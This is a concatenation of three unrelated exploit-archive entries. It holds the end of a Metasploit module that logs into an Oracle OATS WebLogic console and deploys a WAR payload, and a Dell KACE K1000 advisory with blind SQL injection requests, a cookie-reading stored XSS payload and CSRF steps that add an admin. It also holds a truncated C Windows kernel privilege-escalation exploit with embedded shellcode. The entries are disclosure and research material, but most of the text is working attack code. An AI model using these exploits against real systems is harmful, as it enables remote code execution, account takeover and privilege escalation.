res.get_cookies admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first vprint_status("Token for console session is: #{admin_console_session}") login_spec.admin_console_session = admin_console_session end def is_logged_in?(res) html = res.get_html_document a_element = html.at('a') if a_element.respond_to?(:attributes) && a_element.attributes['href'] link = a_element.attributes['href'].value return URI(link).request_uri == '/console' end false end def do_login uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp') res = send_request_cgi({ 'method' => 'GET', 'uri' => uri }) fail_with(Failure::Unknown, 'No response from server') unless res set_admin_console_session(res) uri = normalize_uri(target_uri.path, 'console', 'j_security_check') res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_post' => { 'j_username' => datastore['OATSUSERNAME'], 'j_password' => datastore['OATSPASSWORD'], 'j_character_encoding' => 'UTF-8' } }) fail_with(Failure::Unknown, 'No response while trying to log in') unless res fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res) store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD']) set_admin_console_session(res) end def get_deploy_frsc # First we are just going through the pages in a specific order to get the FRSC value # we need to prepare uploading the WAR file. res = nil requests = [ { path: 'console/', vars: {} }, { path: 'console/console.portal', vars: {'_nfpb'=>"true"} }, { path: 'console/console.portal', vars: {'_nfpb'=>"true", '_pageLabel' => 'HomePage1'} } ] requests.each do |req| res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, req[:path]), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => req[:vars] }) fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res end html = res.get_html_document hidden_input = html.at('input[@name="ChangeManagerPortletfrsc"]') frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil frsc_attr ? frsc_attr.value : '' end def do_select_upload_action action = '/com/bea/console/actions/app/install/selectUploadApp' app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => { 'AppApplicationInstallPortlet_actionOverride' => action }, 'vars_post' => { 'AppApplicationInstallPortletselectedAppPath' => app_path, 'AppApplicationInstallPortletfrsc' => frsc } }) fail_with(Failure::Unknown, "No response from #{action}") unless res end def do_upload_app_action action = '/com/bea/console/actions/app/install/uploadApp' ctype = 'application/octet-stream' app_cname = 'AppApplicationInstallPortletuploadAppPath' plan_cname = 'AppApplicationInstallPortletuploadPlanPath' frsc_cname = 'AppApplicationInstallPortletfrsc' war = war_payload.war war_name = war_payload.name post_data = Rex::MIME::Message.new post_data.add_part(war, ctype, 'binary', "form-data; name=\"#{app_cname}\"; filename=\"#{war_name}.war\"") post_data.add_part('', ctype, nil, "form-data; name=\"#{plan_cname}\"; filename=\"\"") post_data.add_part(frsc, nil, nil, "form-data; name=\"#{frsc_cname}\"") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => { 'AppApplicationInstallPortlet_actionOverride' => action }, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s }) fail_with(Failure::Unknown, "No response from #{action}") unless res print_response_message(res) end def do_app_select_action action = '/com/bea/console/actions/app/install/appSelected' war_name = war_payload.name app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => { 'AppApplicationInstallPortlet_actionOverride' => action }, 'vars_post' => { 'AppApplicationInstallPortletselectedAppPath' => app_path, 'AppApplicationInstallPortletfrsc' => frsc } }) fail_with(Failure::Unknown, "No response from #{action}") unless res print_response_message(res) end def do_style_select_action action = '/com/bea/console/actions/app/install/targetStyleSelected' res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => { 'AppApplicationInstallPortlet_actionOverride' => action }, 'vars_post' => { 'AppApplicationInstallPortlettargetStyle' => 'Application', 'AppApplicationInstallPortletfrsc' => frsc } }) fail_with(Failure::Unknown, "No response from #{action}") unless res end def do_finish_action action = '/com/bea/console/actions/app/install/finish' res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => { 'AppApplicationInstallPortlet_actionOverride' => action }, 'vars_post' => { 'AppApplicationInstallPortletname' => war_payload.name, 'AppApplicationInstallPortletsecurityModel' => 'DDOnly', 'AppApplicationInstallPortletstagingStyle' => 'Default', 'AppApplicationInstallPortletplanStagingStyle' => 'Default', 'AppApplicationInstallPortletfrsc' => frsc } }) fail_with(Failure::Unknown, "No response from #{action}") unless res print_response_message(res) # 302 is a good enough indicator of a successful upload, otherwise # the server would actually return a 200 with an error message. res.code == 302 end def print_response_message(res) html = res.get_html_document message_div = html.at('div[@class="message"]') if message_div msg = message_div.at('span').text print_status("Server replies: #{msg.inspect}") end end def deploy_war set_frsc print_status("FRSC value: #{frsc}") do_select_upload_action do_upload_app_action do_app_select_action do_style_select_action do_finish_action end def goto_war(name) print_good("Operation \"#{name}\" is a go!") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, name) }) print_status("Code #{res.code} on \"#{name}\" request") if res end def undeploy_war war_name = war_payload.name handle = 'com.bea.console.handles.JMXHandle("com.bea:Name=oats,Type=Domain")' contents = %Q|com.bea.console.handles.AppDeploymentHandle("com.bea:Name=#{war_name},Type=AppDeployment")| res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'), 'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}", 'vars_get' => { 'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage', 'AppDeploymentsControlPortlethandle' => handle }, 'vars_post' => { # For some reason, the value given to the server is escapped twice. # The Metasploit API should do it at least once. 'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents), '_pageLabel' => 'AppApplicationUninstallPage', '_nfpb' => 'true', 'AppApplicationUninstallPortletfrsc' => frsc } }) if res && res.code == 302 print_good("Successfully undeployed #{war_name}.war") else print_warning("Unable to successfully undeploy #{war_name}.war") print_warning('You may want to do so manually.') end end def cleanup undeploy_war if is_cleanup_ready super end def setup @is_cleanup_ready = false super end def exploit unless check == Exploit::CheckCode::Detected print_status('Target does not have the login page we are looking for.') return end do_login print_good("Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}") print_status("Ready for war. Codename \"#{war_payload.name}\" at #{war_payload.war.length} bytes") result = deploy_war if result @is_cleanup_ready = true goto_war(war_payload.name) end end attr_reader :frsc attr_reader :is_cleanup_ready end

# Exploit Title: [Dell Kace Appliance Multiple Vulnerabilities] # Date: [12/04/2018] # Exploit Author: [SlidingWindow], Twitter: @kapil_khot # Vendor Homepage: [https://www.quest.com/products/kace-systems-management-appliance/] # Affected Versions: [KACE SMA versions prior to 9.0.270 PATCH SEC2018_20180410] # Tested on: [Quest Kace K1000 Appliance versions, 8.0.318, 8.0.320 and 9.0.270 ] # CVE : [CVE-2018-5404,CVE-2018-5405,CVE-2018-5406] #CERT Advisory: [https://www.kb.cert.org/vuls/id/877837/] #Vendor Advisory: https://support.quest.com/kb/288310/cert-coordination-center-report-update ================== #Product:- ================== Quest KACE, formerly Dell KACE, is a company that specializes in computer appliances for systems management of information technology equipment. It also provides software for security, application virtualization, and systems management products. ================== #Vulnerability:- ================== The Dell Kace K1000 Appliance (Now, Quest Kace K1000) suffers from several vulnerabilities such as Multiple Blind SQL Injection, Stored Cross-Site-Scripting, and mis-configured CORS. ======================== #Vulnerability Details:- ======================== ===================================================================================================================================================== 1. Blind SQL Injection Vulnerability in Ajax_Lookup_List.PHP (CVE-2018-5404) ===================================================================================================================================================== The Dell Kace allows Admin users to access ajax_lookup_list.php. However, it can be accessed by a least privileged user with ‘User Console Only’ rights. Also, the user input supplied to 'selvalue' parameter is not sanitized that leads to a Blind SQL Injection vulnerability. #Proof-Of-Concept: ------------------ 1. Send following request to the target: GET /common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 HTTP/1.1 Host: 192.168.247.100 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.247.100/userui/ticket.php?QUEUE_ID=1 Cookie: kbox_nav=1; KACE_LAST_USER=%98%B59%CB%D9%27f+%28%B6%83b%0F8a%EF; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i0b4qhnv66qg41893hb1q5g146; KACE_CSRF_TOKEN=4862fbb6808731e6658aeca4ea48bd2cac08502ca289e1d3305875b165fb2c86d5441145152ada3f3c701cf2387db6086e7c349c5265ec3b2110978a70ebde6f; KONEA=ebWI%2BP%2FFEgmTioFCZ3xVTgsN174jAtY0mkDdAov5uZtJEpn2FziBYMEinZsmN63zlNfEooUtIXJDgiJgmSKfFk3VvQguPiEAYQIaYpMhcFRQkfyANLWQy2tJzS8mByjYxJZlBRcYhJYlVqAMppyuikdVPOQRynpbiRNSIqVlX0wyxIBFaoF4b8O09p4wYkritpr1qM%2BMoLmA2n3%2BQCY2u%2FvD8DdrIVtm8t2%2BNxMVCCZjfpqpjKef73l7xx2yBxlV9kRG04gPNHXFfv8f4TZB82%2FvurTFqgOWThxp51YjdpWfssEJQsss1O1B3FtYEH0h83Wrl9ABzsRx%2FZafVGjQTw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjozLCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6IjRkMzkwY2M2ODMzZTRkMjk4MTI0NzYyYmQwYjdiNzRjIiwiZXhwIjoxNTIxMzA3NTExfQ.S9h0USN7xS0VmeapB6zWqKnAW-e-vd9J9-NrH9383gSXX6K_vEgXSv0FpuPGCtYQ2I3o7gxuYBKxy_qCqp1xd2w2NRowiZb5_WlwoHBWeTnaP3D9Y6Ek4nd9CKgPaZF1Y8TtaZkdbbWWFTdjtpkD3CK5eNHX_lsqtPD_gVJWwxc Connection: close 2. Make a note of Content-Length in the response body. 3. Send following request: http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13'&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 4. Response to above request shows that an error occurred and we are being redirected to /common/error.php 5. Final payload to check if we get the original response back: http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13''&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 6. These tests confirm that the 'selvalue' parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database. ========================================================================================================================================================= 2. Blind SQL Injection Vulnerability in Oval_Detail.PHP (CVE-2018-5404) ========================================================================================================================================================= The Dell Kace allows Admin users to view OVAL templates via 'oval_detail.php', that can be accessed by a user with ‘Read Only Administrator’ rights. Also, the user input supplied to ID parameter is not sanitized that leads to a Blind SQL Injection vulnerability. An authenticated user with ‘Read Only Administrator’ rights could exploit this vulnerability to retrieve sensitive information from the database. #Proof-Of-Concept: ------------------ 1. Send following request to the target: GET /adminui/oval_detail.php?ID=6200 HTTP/1.1 Host: 192.168.247.100 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.247.100/adminui/oval_list.php Cookie: kbox_nav=1; KACE_LAST_USER=%9A%95%91%5E%AF%B2%A6%FA%02M%B5%7D%08%87%D52; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i48m8gm8kcnbiptc28pq8u7uq1; KACE_CSRF_TOKEN=96acbdac36b0143958a7d96ba318eb5c626884d46733a8ed05c88cfe94d80cfdebe6bd9790ff4fec3a79fa988ff828dac4d841356c72eebb015d20c5ffd5a01a; KONEA=xvqV3k6fWuhsnypD45pPw4OPs7fZxUDP24mubodoYiSj8Y8EqJpUnakrq%2BHEefSs0YkzglNboWvUhE%2FuavTZZrkyNPMF1IH2QB%2FIF7jSm6fLukuuMyLgTFZWtOg16t5eJqCXvn0f54tfwFnfB1tobY%2Fu6MDe8BOWKaj6mByvdD6kNREg%2B%2FLwAcfIYmgJNKYu0Wd9JwsRpWpuRyZkejbrZB%2FSlkh80oHvHSey0inQmIy7B4bYnPCPUfTU8qPeZLaPcvYFchruj%2BabBazlHAaq44txeUy2AtG85ntiN8XPXoZnflHOD%2B5WjTywTtRGiRpCQVQNDbHTOdSUuljpDEyjrw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjo0LCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6ImVlMTk3ZGE5NmFmYTRiYzViYzk5Y2VhMzI3ZjQ2OTdiIiwiZXhwIjoxNTIxMjk3MzE5fQ.GHuAWu_mcviKl0HQcFjY0In5aJxgB-WZCaHP5XQMdpdboby0b1qnwh4DyC3TQg4PktBm_D0Vu4LOMY5KWGRvwOQCTwrzBFLg3ogsKWb0AMO3RArrENXxEO3P3K6XFQCEIlpU9n9K1APnnRSTsfPEL7GC5GkzixakXAlZMZzLB_0 Connection: close Upgrade-Insecure-Requests: 1 2. Response to above request shows some content with the content length of 32109 bytes: 3. It shows information about OVAL-ID#24253: 4. Now send following payload that tests this ID parameter for a true condition: http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6432 5. Response to above request again shows information about the same OVAL-ID#24252: 6. Now, use following payload to test this ID parameter for a false condition: http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6444 7. The response to false condition is different than the response to normal and/or true condition. This response does not show any information about any OVAL-ID: 8. These tests confirm that the ID parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database. ========================================================================================================================================================= 3. Stored Cross Site Scripting (XSS) Vulnerability (CVE-2018-5405) ========================================================================================================================================================= The Dell Kace K1000 fails to sanitize user input when creating a ticket. A least privileged user with ‘User Console Only’ rights could exploit this vulnerability to inject arbitrary JavaScript while creating tickets that would be executed when administrators or any other user view these tickets. An authenticated least privileged user with ‘User Console Only’ rights to inject arbitrary JavaScript code on the tickets page. This script executes every time a user visits this page. This allows a malicious user of the system to steal session cookies of other users including Administrator and take over their session. This can further be exploited to launch other attacks. #Proof-Of-Concept: ------------------ 1. Log into the Dell Kace K1000 web interface as a least privileged user. 2. Navigate to Service Desk-->Tickets and create a new ticket. 3. Inject following payload in the Summary section: Test Ticket</textarea></div></div><script>alert("XSSinSummary");alert(document.cookie);</script><!-- 4. Save the ticket. 5. Go back to tickets and view this newly created ticket and a couple of alert boxes should pop up. 6. Any user, including administrator visiting this ticket page would execute the injected script. ========================================================================================================================================================= 4. Misconfigured CORS Vulnerability (CVE-2018-5406) ========================================================================================================================================================= The Dell Kace K1000 fails to implement Cross Origin Resource Sharing (CORS) properly, that leads to a Cross Site Request Forgery (CSRF) attack. An unauthenticated, remote attacker could exploit this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance’s settings. Also, malicious internal user of the organization could induce an administrator of this appliance to visit a malicious link that exploits this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance’s settings. #Proof-Of-Concept: ------------------ 1. Try to create a new user and capture the request in BurpSuite to create a CSRF PoC from there. Create an HTML form and put it under Web Root of your Kali machine. 2. Log into the web interface of the appliance as admin. 3. Open a new tab in the same browser and access the HTML page from #1 4. Save the ticket. 5. Submit the request (This can be modified to submit the request automatically). 6. Check BurpSuite to see if the request to add user ‘Hacker’ was sent to the appliance and if it was originated from your Kali machine 7. Check the admin console to see if user Hacker has been added: =================================== #Vulnerability Disclosure Timeline: =================================== 04/2018: Submitted report to CERT-US. 04/2018: CERT-US reported the issue to vendor. 05/2018: Awaiting vendor response. 10/2018: Vendor asked to test the patch as they have fixed these issues already. 10/2018: Confirmed that all the vulnerabilities except Vulnerability#2 is fixed in 9.0.270 and still exists in other patched version. 01/2019: Vendor confirmed that they are working on fixing all of the vulnerabilities and would release a patch on May 01 2019 and asked to publish this on June 01 2019 so that customers have enough time to patch. 05/2019: Vendor published an advisory. 06/2019: CERT-US published a Vulnerability Note, VU#877837.

#include "hd.h" // EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46945.rar byte __s_code[]={ 0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 , 0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 , 0x4C ,0x89 ,0x70 ,0x10 ,0x90 ,0x65 ,0x48 ,0x8B ,0x04 ,0x25 ,0x30 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8B , 0x40 ,0x60 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x8B ,0x78 ,0x18 ,0x48 ,0x8B ,0x47 ,0x10 ,0x48 ,0x83 , 0xC7 ,0x10 ,0x48 ,0x3B ,0xC7 ,0x0F ,0x84 ,0x99 ,0x01 ,0x00 ,0x00 ,0x48 ,0xBB ,0x65 ,0x00 ,0x6C , 0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x48 ,0xBE ,0x2E ,0x00 ,0x64 ,0x00 ,0x6C ,0x00 ,0x6C ,0x00 ,0x49 , 0xBA ,0x6B ,0x00 ,0x65 ,0x00 ,0x72 ,0x00 ,0x6E ,0x00 ,0x48 ,0xBD ,0x4B ,0x00 ,0x45 ,0x00 ,0x52 , 0x00 ,0x4E ,0x00 ,0x49 ,0xB8 ,0x45 ,0x00 ,0x4C ,0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x49 ,0xB9 ,0x2E , 0x00 ,0x44 ,0x00 ,0x4C ,0x00 ,0x4C ,0x00 ,0x66 ,0x0F ,0x1F ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 , 0x66 ,0x83 ,0x78 ,0x58 ,0x18 ,0x48 ,0x8B ,0x48 ,0x60 ,0x72 ,0x25 ,0x48 ,0x8B ,0x11 ,0x49 ,0x3B , 0xD2 ,0x75 ,0x0C ,0x48 ,0x39 ,0x59 ,0x08 ,0x75 ,0x06 ,0x48 ,0x39 ,0x71 ,0x10 ,0x74 ,0x1E ,0x48 , 0x3B ,0xD5 ,0x75 ,0x0C ,0x4C ,0x39 ,0x41 ,0x08 ,0x75 ,0x06 ,0x4C ,0x39 ,0x49 ,0x10 ,0x74 ,0x0D , 0x48 ,0x8B ,0x00 ,0x48 ,0x3B ,0xC7 ,0x75 ,0xC8 ,0xE9 ,0x17 ,0x01 ,0x00 ,0x00 ,0x48 ,0x8B ,0x78 , 0x30 ,0x48 ,0x85 ,0xFF ,0x0F ,0x84 ,0x0A ,0x01 ,0x00 ,0x00 ,0x48 ,0x63 ,0x47 ,0x3C ,0xB9 ,0x4D , 0x5A ,0x00 ,0x00 ,0x66 ,0x39 ,0x0F ,0x0F ,0x85 ,0xF8 ,0x00 ,0x00 ,0x00 ,0x81 ,0x3C ,0x38 ,0x50 , 0x45 ,0x00 ,0x00 ,0x0F ,0x85 ,0xEB ,0x00 ,0x00 ,0x00 ,0x44 ,0x8B ,0x8C ,0x38 ,0x88 ,0x00 ,0x00 , 0x00 ,0x49 ,0x8B ,0xD6 ,0x4C ,0x03 ,0xCF ,0x45 ,0x8B ,0x41 ,0x20 ,0x41 ,0x8B ,0x49 ,0x18 ,0x4C , 0x03 ,0xC7 ,0x48 ,0x85 ,0xC9 ,0x74 ,0x32 ,0x48 ,0xBB ,0x43 ,0x72 ,0x65 ,0x61 ,0x74 ,0x65 ,0x50 , 0x72 ,0x49 ,0xBA ,0x72 ,0x6F ,0x63 ,0x65 ,0x73 ,0x73 ,0x41 ,0x00 ,0x0F ,0x1F ,0x44 ,0x00 ,0x00 , 0x41 ,0x8B ,0x04 ,0x90 ,0x48 ,0x39 ,0x1C ,0x38 ,0x75 ,0x07 ,0x4C ,0x39 ,0x54 ,0x38 ,0x07 ,0x74 , 0x08 ,0x48 ,0xFF ,0xC2 ,0x48 ,0x3B ,0xD1 ,0x72 ,0xE7 ,0x33 ,0xC0 ,0x48 ,0x3B ,0xD1 ,0x0F ,0x83 , 0x92 ,0x00 ,0x00 ,0x00 ,0x41 ,0x8B ,0x49 ,0x24 ,0x45 ,0x33 ,0xC0 ,0x48 ,0x03 ,0xCF ,0x0F ,0xB7 , 0x14 ,0x51 ,0x41 ,0x8B ,0x49 ,0x1C ,0x45 ,0x33 ,0xC9 ,0x48 ,0x03 ,0xCF ,0x44 ,0x8B ,0x14 ,0x91 , 0x48 ,0x89 ,0x44 ,0x24 ,0x58 ,0x48 ,0x89 ,0x44 ,0x24 ,0x60 ,0x4C ,0x03 ,0xD7 ,0x48 ,0x8D ,0x7C , 0x24 ,0x70 ,0xB9 ,0x68 ,0x00 ,0x00 ,0x00 ,0xF3 ,0xAA ,0xB8 ,0x05 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B , 0xD3 ,0x66 ,0x89 ,0x84 ,0x24 ,0xB0 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8D ,0x44 ,0x24 ,0x50 ,0x33 ,0xC9 , 0x48 ,0x89 ,0x44 ,0x24 ,0x48 ,0x48 ,0x8D ,0x44 ,0x24 ,0x70 ,0x4C ,0x89 ,0x74 ,0x24 ,0x50 ,0x48 , 0x89 ,0x44 ,0x24 ,0x40 ,0x4C ,0x89 ,0x74 ,0x24 ,0x38 ,0x4C ,0x89 ,0x74 ,0x24 ,0x30 ,0xC7 ,0x44 , 0x24 ,0x28 ,0x10 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x70 ,0x68 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x84 , 0x24 ,0xAC ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x20 ,0x01 ,0x00 ,0x00 , 0x00 ,0x41 ,0xFF ,0xD2 ,0x33 ,0xC0 ,0x4C ,0x8D ,0x9C ,0x24 ,0xE0 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B , 0x5B ,0x20 ,0x49 ,0x8B ,0x6B ,0x38 ,0x49 ,0x8B ,0xE3 ,0x41 ,0x5E ,0x5F ,0x5E ,0xC3 }; HMENU __init_menu( ) { HMENU hMenu_Ret=NULL; MENUITEMINFO mItem={0}; do { HMENU hme=CreatePopupMenu(); if (hme==NULL){ printf("CreatePopupMenu()_1 fail:0x%x\n" ,GetLastError()); break; } mItem.cbSize=sizeof(MENUITEMINFO); mItem.fMask=(MIIM_STRING); bool bisok=InsertMenuItem(hme ,0 ,1 ,&mItem); if (bisok==false){ printf("InsertMenuItem()_1 fail:0x%x\n" ,GetLastError()); break; } hMenu_Ret=CreatePopupMenu(); if (hMenu_Ret==NULL){ printf("CreatePopupMenu()_2 fail:0x%x\n" ,GetLastError()); break; } MENUITEMINFO mi={0}; mi.cbSize=sizeof(mi); mi.fMask=(MIIM_STRING|MIIM_SUBMENU); mi.hSubMenu=hme; mi.dwTypeData=""; mi.cch=1; bisok=InsertMenuItem(hMenu_Ret ,0 ,1 ,&mi); if (bisok==false){ printf("InsertMenuItem()_2 fail: 0x%x\n" ,GetLastError()); } } while (false); return hMenu_Ret; } PVOID __calc_sep_token_addr( ) { NTSTATUS status; PSYSTEM_HANDLE_INFORMATION handleInfo=NULL; ULONGLONG handleInfoSize = 0x10000 ,i ,ret_obj_addr=NULL; do { _NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation"); _NtDuplicateObject NtDuplicateObject = (_NtDuplicateObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtDuplicateObject"); _NtQueryObject NtQueryObject = (_NtQueryObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQueryObject"); if (!NtQuerySystemInformation || !NtDuplicateObject || !NtQueryObject){ printf("get sys proc failed!\n"); break; } handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize); while ((status = NtQuerySystemInformation(SystemHandleInformation,handleInfo, handleInfoSize,NULL)) == STATUS_INFO_LENGTH_MISMATCH) handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2); if (!NT_SUCCESS(status)){ printf("NtQuerySystemInformation failed!\n"); break; } POBJECT_TYPE_INFORMATION objectTypeInfo=(POBJECT_TYPE_INFORMATION)malloc(0x1000); for (i = 0; i < handleInfo->HandleCount; i++) { SYSTEM_HANDLE handle = handleInfo->Handles[i]; if (handle.ProcessId != GetCurrentProcessId()) continue; if (!NT_SUCCESS(NtQueryObject( (HANDLE)handle.Handle, ObjectTypeInformation, objectTypeInfo, 0x1000, NULL ))) { printf("[%#x] Error!\n", handle.Handle); continue; } if (objectTypeInfo->Name.Buffer==NULL || objectTypeInfo->Name.Length==0) continue; if (wcscmp(objectTypeInfo->Name.Buffer ,L"Token")) continue; ret_obj_addr=((ULONGLONG)handle.Object+0x40); } if (objectTypeInfo) free(objectTypeInfo); if (handleInfo) free(handleInfo); } while (false); return (PVOID)ret_obj_addr; } ULONGLONG __calc_pid( ) { NTSTATUS status; PSYSTEM_PROCESS_INFORMATION PsInfo=NULL; ULONGLONG PsInfoSize = 0x10000 ,ret_pid=NULL; do { _NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation){ printf("get sys proc failed!\n"); break; } PsInfo = (PSYSTEM_PROCESS_INFORMATION)malloc(PsInfoSize); while ((status = NtQuerySystemInformation(SystemProcessesAndThreadsInformation,PsInfo, PsInfoSize ,NULL)) == STATUS_INFO_LENGTH_MISMATCH) PsInfo = (PSYSTEM_PROCESS_INFORMATION)realloc(PsInfo, PsInfoSize*= 2); if (!NT_SUCCESS(status)){ printf("NtQuerySystemInformation failed!\n"); break; } for (;PsInfo->NextEntryDelta ;PsInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONGLONG)PsInfo + PsInfo->NextEntryDelta)) { if (PsInfo->ProcessName.Buffer==NULL || PsInfo->ProcessName.Length==0) continue; if (!wcscmp(PsInfo->ProcessName.Buffer ,L"winlogon.exe")){ ret_pid=PsInfo->InheritedFromProcessId; break; } } } while (false); return ret_pid; } ULONGLONG __init_fake_wnd_pti( ) { ULONGLONG ret_pti=NULL; ULONGLONG dst_proc_addr=NULL; do { ret_pti=(ULONGLONG)malloc(0x500); if (ret_pti==NULL){ printf("malloc fail!\n"); return NULL; } *(ULONGLONG*)(ret_pti+_oft_win32ps_pti)=0; //Win32Process *(DWORD*)(ret_pti+_oft_0420h_pti)=0; //not 0x20 *(ULONGLONG*)(ret_pti+_oft_list_header_pti)=(ULONGLONG)__calc_sep_token_addr()-0x5; //TODO: void* tmpbuf=malloc(0x100); memset(tmpbuf ,0 ,0x100); *(ULONGLONG*)(ret_pti+_oft_0188h_pti)=(ULONGLONG)tmpbuf; //buf addr(size >= 0x12) ,check in win32k!SetWakeBit } while (false); return ret_pti; } bool __init_fake_tagWnd( ) { bool bRet=false; _ZwAllocateVirtualMemory_pt pfn_ZwAllocateVm=NULL; do { HMODULE hmd=LoadLibrary("ntdll.dll"); if (hmd==NULL) break; ULONGLONG fake_tagwnd_pti=__init_fake_wnd_pti(); if (fake_tagwnd_pti==NULL){ printf("__calc_wnd_pti() fail!\n"); break; } pfn_ZwAllocateVm=(_ZwAllocateVirtualMemory_pt)GetProcAddress(hmd ,"ZwAllocateVirtualMemory"); if (pfn_ZwAllocateVm==NULL){ printf("pfn ZwAllocateVirtualMemery addr is NULL!\n"); break; } BYTE* fake_tagWnd_addr=(BYTE*)0xFFFFFFFB; size_t region_size=0x20000; NTSTATUS status=pfn_ZwAllocateVm(GetCurrentProcess() ,(PVOID*)&fake_tagWnd_addr ,0 ,&region_size, MEM_RESERVE | MEM_COMMIT|MEM_TOP_DOWN ,PAGE_EXECUTE_READWRITE); if (status < 0){ printf("Allocate fake 